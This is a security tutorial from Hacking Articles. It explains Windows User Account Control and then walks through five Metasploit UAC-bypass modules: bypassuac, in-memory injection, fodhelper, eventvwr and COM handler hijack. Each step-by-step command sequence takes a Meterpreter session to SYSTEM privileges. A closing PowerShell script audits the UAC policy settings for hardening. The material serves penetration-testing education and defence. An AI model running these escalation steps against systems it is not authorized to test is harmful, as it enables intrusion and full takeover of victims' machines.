Privilege Escalation

Multiple Ways to Bypass UAC using Metasploit

In this post we shed light on User Account Control, commonly known as UAC. We will also look at how it can protect you from malicious software, and how ignoring the UAC prompt can put your system at risk.

Table of Content

Introduction to UAC

  • What is UAC?
  • Working of UAC

Techniques 

  1. Windows Escalate UAC Protection Bypass
  2. Windows Escalate UAC Protection Bypass (In Memory Injection)
  3. Windows UAC Protection Bypass (Via FodHelper Registry Key)
  4. Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
  5. Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)

Introduction to User Account Control

What is User Account Control?

User Account Control was introduced with Microsoft’s Windows Vista and Windows Server 2008 operating systems to prevent unwanted system-wide changes in a way that is predictable and requires minimal effort from the user.

In other words, it is a security feature of Windows which helps prevent unauthorized modifications to the operating system. UAC makes sure that certain changes are made only with authorization from the administrator. If the changes are not permitted by the administrator, they are not executed, and Windows remains unchanged.

How does UAC work?

UAC works by preventing a program from carrying out tasks which involve system-wide changes. These operations will not work unless the process attempting to carry them out is running with administrator rights. If you run a program as administrator, it will have more privileges since it is “elevated”, compared to programs which are not running as administrator.

Some things which cannot be done without administrator rights:

  • Registry modifications (a key under HKEY_LOCAL_MACHINE, for example, is read-only to a non-elevated process, since it affects more than one user)
  • Loading a device driver
  • DLL injection
  • Modifying system time (clock)
  • Modifying User Account Control settings (UAC can be enabled/disabled via the Registry, but you need the correct privileges to do this)
  • Modify protected directories (e.g. Windows folder, Program Files)
  • Scheduled tasks (e.g. to auto-start with administrator privileges)

UAC won’t automatically block malicious software; its purpose was never to determine whether a program is malicious or not. That is down to the user just as much. If a program is going to be executed with administrator privileges, the user will be alerted and will need to provide confirmation.

//malwaretips.com/threads/why-uac-is-important-and-how-it-can-protect-you.47157/

Techniques 

First, exploit the target machine to obtain a Meterpreter session. Once you have Meterpreter session 1, type the following commands to check the current user and its privileges.

getsystem
getuid

If you do not have SYSTEM/admin privileges, the next step is to bypass the UAC protection of the target system.

Windows Escalate UAC Protection Bypass

This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off.

msf > use exploit/windows/local/bypassuac
msf exploit(windows/local/bypassuac) > set session 1
msf exploit(windows/local/bypassuac) > exploit

From the given image you can observe that Meterpreter session 2 has opened; now type the following commands to determine the privileges of the new session.

getsystem
getuid

Great!! Here we have NT AUTHORITY\SYSTEM privileges; if you now type the “shell” command, you get a command prompt with administrator privileges.

Windows Escalate UAC Protection Bypass (In Memory Injection)

This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off. This module uses the Reflective DLL Injection technique to drop only the DLL payload binary instead of the three separate binaries used in the standard technique. However, it requires the correct architecture to be selected (use x64 for SYSWOW64 systems as well). If specifying EXE::Custom, your DLL should call ExitProcess() after starting your payload in a separate process.

msf > use exploit/windows/local/bypassuac_injection
msf exploit(windows/local/bypassuac_injection) > set session 1
msf exploit(windows/local/bypassuac_injection) > exploit

From the given image you can observe that Meterpreter session 2 has opened; now type the following commands to determine the privileges of the new session.

getsystem
getuid

Ultimately you get NT AUTHORITY\SYSTEM privileges; if you now run the “shell” command, you get a command prompt with administrator privileges.

Windows UAC Protection Bypass (Via FodHelper Registry Key)

This module will bypass Windows 10 UAC by hijacking a special key in the Registry under the current user hive and inserting a custom command that will get invoked when the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom, your DLL should call ExitProcess() after starting your payload in a separate process.

msf > use exploit/windows/local/bypassuac_fodhelper
msf exploit(windows/local/bypassuac_fodhelper) > set session 1
msf exploit(windows/local/bypassuac_fodhelper) > exploit

From the given image you can observe that Meterpreter session 2 has opened; now type the following commands to determine the privileges of the new session.

getsystem
getuid

Great!! Here we have NT AUTHORITY\SYSTEM privileges; if you now type the “shell” command, you get a command prompt with administrator privileges.

Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)

This module will bypass Windows UAC by hijacking a special key in the Registry under the current user hive and inserting a custom command that will get invoked when the Windows Event Viewer is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom, your DLL should call ExitProcess() after starting your payload in a separate process.

msf > use exploit/windows/local/bypassuac_eventvwr
msf exploit(windows/local/bypassuac_eventvwr) > set session 1
msf exploit(windows/local/bypassuac_eventvwr) > exploit

From the given image you can observe that Meterpreter session 2 has opened; now type the following commands to determine the privileges of the new session.

getsystem
getuid

And again you get NT AUTHORITY\SYSTEM privileges.

Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)

This module will bypass Windows UAC by creating COM handler registry entries in the HKCU hive. When certain high-integrity processes are loaded, these registry entries are referenced, resulting in the process loading user-controlled DLLs. These DLLs contain the payloads that result in elevated sessions. Registry key modifications are cleaned up after payload invocation. This module requires the architecture of the payload to match the OS, but the current low-privilege Meterpreter session architecture can be different. If specifying EXE::Custom, your DLL should call ExitProcess() after starting your payload in a separate process. This module invokes the target binary via cmd.exe on the target; therefore, if cmd.exe access is restricted, this module will not run correctly.

msf > use exploit/windows/local/bypassuac_comhijack
msf exploit(windows/local/bypassuac_comhijack) > set session 1
msf exploit(windows/local/bypassuac_comhijack) > exploit

From the given image you can observe that Meterpreter session 2 has opened; now type the following commands to determine the privileges of the new session.

getsystem
getuid

Finally, you get NT AUTHORITY\SYSTEM privileges; if you run the “shell” command once more, you get a command prompt with administrator privileges. In this way we can use Metasploit’s post-exploitation modules to bypass UAC protection.
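Every module above depends on UAC being left at a level where Windows binaries such as fodhelper.exe and Event Viewer auto-elevate without a consent prompt, which is the default setting rather than “Always notify”. The following PowerShell audit is an added example, not part of the original post or of Metasploit; it assumes a Windows host with read access to HKLM and uses Microsoft’s documented UAC policy value names (EnableLUA, ConsentPromptBehaviorAdmin, PromptOnSecureDesktop) under the Policies\System key to report whether the prompt behaviour is hardened.

```powershell
# Added example (not from the original post): audit the UAC policy values that
# decide whether an administrator's processes may auto-elevate silently.
# Assumptions: Windows host, HKLM readable, documented policy value names.
$policyKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

# Hardened targets:
#   EnableLUA = 1                  UAC is enabled at all
#   ConsentPromptBehaviorAdmin = 2 "Always notify" (the default, 5, only prompts
#                                  for non-Windows binaries, so trusted Windows
#                                  binaries auto-elevate without a prompt)
#   PromptOnSecureDesktop = 1      prompt is shown on the secure desktop
$expected = @{
    EnableLUA                  = 1
    ConsentPromptBehaviorAdmin = 2
    PromptOnSecureDesktop      = 1
}

function Test-UacPolicy {
    param(
        [string]$Key = $policyKey,
        [hashtable]$Expected = $expected
    )
    # Missing values read back as $null and are reported as WEAK rather than OK.
    $props = Get-ItemProperty -Path $Key -ErrorAction Stop
    foreach ($name in $Expected.Keys) {
        $actual = $props.$name
        [pscustomobject]@{
            Setting  = $name
            Actual   = $actual
            Expected = $Expected[$name]
            Status   = if ($actual -eq $Expected[$name]) { 'OK' } else { 'WEAK' }
        }
    }
}

# Report every UAC policy setting together with its hardened target value.
Test-UacPolicy | Format-Table -AutoSize
```

Any row reported as WEAK means the prompt level permits the silent auto-elevation these bypasses rely on; the stronger control is still to give day-to-day accounts standard-user rights only, since a UAC bypass needs an account that is already a member of the local Administrators group.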

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, and a lover of social media and gadgets.